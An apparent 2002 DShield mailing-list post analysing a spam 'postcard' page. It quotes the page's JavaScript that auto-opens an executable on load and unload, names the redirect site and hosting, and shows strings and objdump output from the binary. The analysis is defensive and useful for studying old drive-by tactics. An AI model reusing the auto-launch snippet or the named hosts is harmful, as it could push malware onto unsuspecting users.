[Dshield] Weird German Porn Spam?

John Sage jsage at finchhaven.com
Mon Nov 18 05:35:49 GMT 2002


Brenna:

On Sun, Nov 17, 2002 at 06:08:47PM -0600, Brenna Primrose wrote:
> I received a suspicious "postcard" e-mail today, and thinking it might
> be something similar to the recent "FriendGreetings" scam, I decided to
> check it out.  I first followed the link using IE 6, but it came up with
> an error.  I then opened it in Opera 6.05 and viewed the source, which
> redirects to http://nina.xfiles24.com.futuresite.register.com/
> (216.21.224.200) - some sort of a porno-looking card.  The card is
> linked to an executable hosted on netmails.com.  I don't accept popups
> in either of these browsers by default, but it looks as if a javascript
> on this page attempts to automatically launch an .exe: 
> 
> <!--
> function MM_openBrWindow(theURL,winName,features) { //v2.0
>   window.open(theURL,winName,features);
> }
> //-->
> </script>
> </HEAD>
> <BODY vLink=#9933ff aLink=#9933ff link=#9933ff bgColor=#000080
> onUnload="MM_openBrWindow('deine_nina.exe','','')"
> onLoad="MM_openBrWindow('deine_nina.exe','','')">

Here's strings run against deine_nina.exe:

<snip>
wan-mini
port (pptp)
l2dsK
lkarallel>
schluss (direkt
9675modem
<snip>
1)No 
ISDN DEVICE cul
<snip>
2;46:43:4;;
3;6\7:#
SwedenDanmark
m7Belgium
<snip>
ado o
_wzur'AOL
<snip>
@LoadLibrary
lRrcf
vX	p)
Modu
tiBy
o1deChj(
InfoA
RegOpenKey
QueMV)
<snip>
KERNEL32.DLL
ADVAPI32.dll
MFC42.DLL
MSVCRT.dll
ole32.dll
SHELL32.dll
USER32.dll
LoadLibraryA
GetProcAddress
ExitProcess
RegCloseKey
exit
CoInitialize
ShellExecuteA
DrawIcon


objdump dumps core on deine_nina.exe, but:

[toot at sparky /home/www/html/sys_docs/virii]# objdump -x deine_nina.exe 
deine_nina.exe:     file format efi-app-ia32
deine_nina.exe
architecture: i386, flags 0x0000010a:
EXEC_P, HAS_DEBUG, D_PAGED
start address 0x0042fdf0

Characteristics 0x10f
	relocations stripped
	executable
	line numbers stripped
	symbols stripped
	32 bit words

Time/Date		Tue Jul 30 05:54:51 2002

ImageBase		00400000
SectionAlignment	00001000
FileAlignment		00000200
MajorOSystemVersion	4
MinorOSystemVersion	0
MajorImageVersion	0
MinorImageVersion	0
MajorSubsystemVersion	4
MinorSubsystemVersion	0
Win32Version		00000000
SizeOfImage		00032000
SizeOfHeaders		00000400
CheckSum		00000000
Subsystem		00000002	(Windows GUI)
DllCharacteristics	00000000
SizeOfStackReserve	00100000
SizeOfStackCommit	00001000
SizeOfHeapReserve	00100000
SizeOfHeapCommit	00001000
LoaderFlags		00000000
NumberOfRvaAndSizes	00000010

The Data Directory
Entry 0 00000000 00000000 Export Directory [.edata (or where ever we found it)]
Entry 1 00031794 0000019c Import Directory [parts of .idata]
Entry 2 00030000 00001794 Resource Directory [.rsrc]
Entry 3 00000000 00000000 Exception Directory [.pdata]
Entry 4 00000000 00000000 Security Directory
Entry 5 00000000 00000000 Base Relocation Directory [.reloc]
Entry 6 00000000 00000000 Debug Directory
Entry 7 00000000 00000000 Description Directory
Entry 8 00000000 00000000 Special Directory
Entry 9 00000000 00000000 Thread Storage Directory [.tls]
Entry a 00000000 00000000 Load Configuration Directory
Entry b 00000000 00000000 Bound Import Directory
Entry c 00000000 00000000 Import Address Table Directory
Entry d 00000000 00000000 Delay Import Directory
Entry e 00000000 00000000 Reserved
Entry f 00000000 00000000 Reserved

There is an import table in .rsrc at 0x431794

The Import Tables (interpreted .rsrc section contents)
 vma:            Hint    Time      Forward  DLL       First
                 Table   Stamp     Chain    Name      Thunk
 00031794	00000000 00000000 00000000 00031874 00031834

	DLL Name: KERNEL32.DLL
	The Import Address Table (difference found)
	vma:  Hint/Ord Member-Name
	318c4	    0  LoadLibraryA
	318d2	    0  GetProcAddress
	318e2	    0  ExitProcess

 000317a8	00000000 00000000 00000000 00031881 00031844

	DLL Name: ADVAPI32.dll
	The Import Address Table (difference found)
	vma:  Hint/Ord Member-Name
	318f0	    0  RegCloseKey

 000317bc	00000000 00000000 00000000 0003188e 0003184c

	DLL Name: MFC42.DLL
	The Import Address Table (difference found)
	vma:  Hint/Ord Member-Name
Segmentation fault (core dumped)



Googling on "advapi32.dll" is interesting; it seems to be involved
with Registry manipulation:

http://www.experts-exchange.com/Programming/Programming_Languages/Visual_Basic/Q_10543542.html

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKEY As
Long) As Long

Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias
"RegCreateKeyExA" (ByVal HKEY As Long, ByVal lpSubKey As String, ByVal
Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long,
ByVal samDesired As Long, ByVal lpSecurityAttributes As Long,
phkResult As Long, lpdwDisposition As Long) As Long

Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias
"RegDeleteKeyA" (ByVal HKEY As Long, ByVal lpSubKey As String) As Long

Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias
"RegDeleteValueA" (ByVal HKEY As Long, ByVal lpValueName As String) As
Long

Private Declare Function RegEnumKeyEx Lib "advapi32.dll" Alias
"RegEnumKeyExA" (ByVal HKEY As Long, ByVal dwIndex As Long, ByVal
lpName As String, lpcbName As Long, lpReserved As Long, ByVal lpClass
As String, lpcbClass As Long, lpftLastWriteTime As FILETIME) As Long

Private Declare Function RegEnumValue Lib "advapi32.dll" Alias
"RegEnumValueA" (ByVal HKEY As Long, ByVal dwIndex As Long, ByVal
lpValueName As String, lpcbValueName As Long, ByVal lpReserved As
Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As
Long

Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias
"RegOpenKeyExA" (ByVal HKEY As Long, ByVal lpSubKey As String, ByVal
ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As
Long

Private Declare Function RegQueryValueExString Lib "advapi32.dll"
Alias "RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As
String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As
String, lpcbData As Long) As Long

Private Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias
"RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As
Long) As Long

Private Declare Function RegQueryValueExBinary Lib "advapi32.dll"
Alias "RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As
String, ByVal lpReserved As Long, lpType As Long, lpData As Long,
lpcbData As Long) As Byte

Private Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias
"RegQueryValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long,
lpcbData As Long) As Long

Private Declare Function RegSetValueExString Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String,
ByVal cbData As Long) As Long

Private Declare Function RegSetValueExLong Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal
cbData As Long) As Long

Private Declare Function RegSetValueExBinary Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal HKEY As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, lpValue() As Byte, ByVal
cbData As Long) As Long
<snip>



Fun stuff, huh?


- John
-- 
Forest: a collection of trees

    PGP key: http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705




More information about the list mailing list